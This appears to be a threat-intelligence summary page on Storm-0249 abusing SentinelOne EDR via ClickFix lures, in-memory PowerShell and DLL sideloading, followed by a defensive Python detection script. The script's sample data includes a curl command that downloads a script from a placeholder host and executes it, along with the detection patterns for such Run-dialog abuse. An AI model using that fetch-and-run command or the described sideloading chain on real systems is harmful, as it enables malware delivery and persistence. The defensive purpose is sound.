
Storm-0249 SentinelOne EDR abuse for stealthy malware execution

Malware Activity
Happening score: 14
1 unique source, 1 article

Summary


Storm-0249 is abusing SentinelOne EDR components and trusted Windows utilities to load malware, establish C2, and maintain persistence, activity that can precede ransomware deployment. The chain uses ClickFix social engineering, in-memory PowerShell, and DLL sideloading so that malicious execution blends into normal endpoint activity and is harder for defenders to detect and block.

Related Happenings

Microsoft Defender for Endpoint automatic endpoint isolation preview

Security Tool/Service
First: 26.05.2026 15:19 Last: 26.05.2026 15:19 Sources 1

About this happening: Microsoft is previewing **automatic isolation** for compromised endpoints in **Defender for Endpoint**, reducing **lateral movement** risk on managed workstations. The capability...

Vidar infostealer market rise and distribution expansion

Malware Activity
First: 28.04.2026 22:07 Last: 28.04.2026 22:07 Sources 1

About this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

DRILLAPP JavaScript backdoor through Microsoft Edge

Malware Activity
First: 16.03.2026 11:07 Last: 16.03.2026 11:07 Sources 1

About this happening: Observed in **February 2026**, the **DRILLAPP** backdoor now runs through **Microsoft Edge**, giving it **file access** plus access to the **microphone**, **webcam**, and **screen...

BlackSanta EDR killer malware activity targeting HR departments

Malware Activity
First: 11.03.2026 00:57 Last: 11.03.2026 00:57 Sources 1

About this happening: The **BlackSanta** malware operation has run for **more than a year**, targeting **HR departments** and using an **EDR killer** to weaken host defenses before payload execution. T...

Timeline

  1. 09.12.2025 17:24 2 articles · 5mo ago

    Storm-0249 SentinelOne EDR abuse

    Technical Analysis Update

    Storm-0249 abuses SentinelOne EDR components and trusted Microsoft Windows utilities to hide malicious activity, maintain persistence, and funnel encrypted HTTPS command-and-control traffic while preparing ransomware operations. The activity chain uses ClickFix social engineering, malicious curl commands in the Windows Run dialog, a spoofed Microsoft domain delivering PowerShell in memory, and SentinelAgentCore.dll sideloading through SentinelAgentWorker.exe to make the malicious code look like routine endpoint activity.

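The two host-side signals in the chain above, a curl launched from the Run dialog and SentinelAgentWorker.exe loading a SentinelAgentCore.dll that is not the vendor's, can be checked against process-start and image-load telemetry. The following is an added detection example written for this page; it is not code from the original report, from SentinelOne, or from Microsoft. The event records are constructed, the SentinelOne install directory and signer name are assumptions to be verified against a known-good host, and the domains are placeholders rather than the spoofed domain the report mentions.

```python
"""Added example: flag (1) ClickFix-style curl started by explorer.exe with a
remote URL, as happens when a user pastes a command into the Run dialog, and
(2) SentinelAgentWorker.exe loading SentinelAgentCore.dll from outside the
agent's install tree or without the expected signer (DLL sideloading).
Events, install path and signer are constructed/assumed for illustration."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumption: legitimate agent binaries live under this tree on the fleet.
EXPECTED_AGENT_DIRS = ("c:\\program files\\sentinelone\\",)
# Assumption: subject of the vendor's code-signing certificate; confirm locally.
EXPECTED_SIGNER = "sentinel labs, inc."

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


@dataclass
class ProcEvent:          # modelled on a Sysmon EID 1 / EDR process-start record
    image: str
    parent_image: str
    command_line: str


@dataclass
class ImageLoadEvent:     # modelled on a Sysmon EID 7 / EDR image-load record
    process_image: str
    loaded_image: str
    signer: str           # "" when unsigned
    signature_valid: bool


def clickfix_curl(ev: ProcEvent) -> bool:
    """curl spawned directly by explorer.exe with a URL is the Run-dialog pattern;
    routine admin use of curl comes from a console host such as cmd/powershell."""
    image = PureWindowsPath(ev.image).name.lower()
    parent = PureWindowsPath(ev.parent_image).name.lower()
    return image in ("curl.exe", "curl") and parent == "explorer.exe" \
        and bool(URL_RE.search(ev.command_line))


def sideloaded_agent_dll(ev: ImageLoadEvent) -> bool:
    """True when the worker loads SentinelAgentCore.dll but either binary sits
    outside the install tree or the DLL lacks a valid vendor signature."""
    proc = PureWindowsPath(ev.process_image)
    dll = PureWindowsPath(ev.loaded_image)
    if proc.name.lower() != "sentinelagentworker.exe" \
            or dll.name.lower() != "sentinelagentcore.dll":
        return False
    worker_in_tree = str(proc).lower().startswith(EXPECTED_AGENT_DIRS)
    dll_in_tree = str(dll).lower().startswith(EXPECTED_AGENT_DIRS)
    signer_ok = ev.signature_valid and ev.signer.lower() == EXPECTED_SIGNER
    return not (worker_in_tree and dll_in_tree and signer_ok)


def scan(proc_events, load_events):
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for ev in proc_events:
        if clickfix_curl(ev):
            alerts.append(f"clickfix_curl: {ev.command_line}")
    for ev in load_events:
        if sideloaded_agent_dll(ev):
            alerts.append(f"agent_dll_sideload: {ev.loaded_image} "
                          f"(signer={ev.signer or 'none'})")
    return alerts


# Constructed sample telemetry, not captured from a real host.
SAMPLE_PROC_EVENTS = [
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\explorer.exe",
              "curl https://update.example.invalid/s -o %TEMP%\\s.cmd & %TEMP%\\s.cmd"),
    ProcEvent(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              "curl https://intranet.example.invalid/status"),
]
SAMPLE_LOAD_EVENTS = [
    ImageLoadEvent(r"C:\Program Files\SentinelOne\Sentinel Agent 23.4.2\SentinelAgentWorker.exe",
                   r"C:\Program Files\SentinelOne\Sentinel Agent 23.4.2\SentinelAgentCore.dll",
                   "Sentinel Labs, Inc.", True),
    ImageLoadEvent(r"C:\Users\j.doe\AppData\Roaming\svc\SentinelAgentWorker.exe",
                   r"C:\Users\j.doe\AppData\Roaming\svc\SentinelAgentCore.dll",
                   "", False),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_PROC_EVENTS, SAMPLE_LOAD_EVENTS):
        print(alert)
```

The DLL-path check matters more than the process-path check: sideloading usually copies the signed vendor EXE to a writable directory next to the attacker's DLL, so the worker's own signature still validates and only its location and the DLL's provenance give it away. On a live fleet, pair this with the RunMRU registry key of the affected user, which is where the pasted Run-dialog command persists.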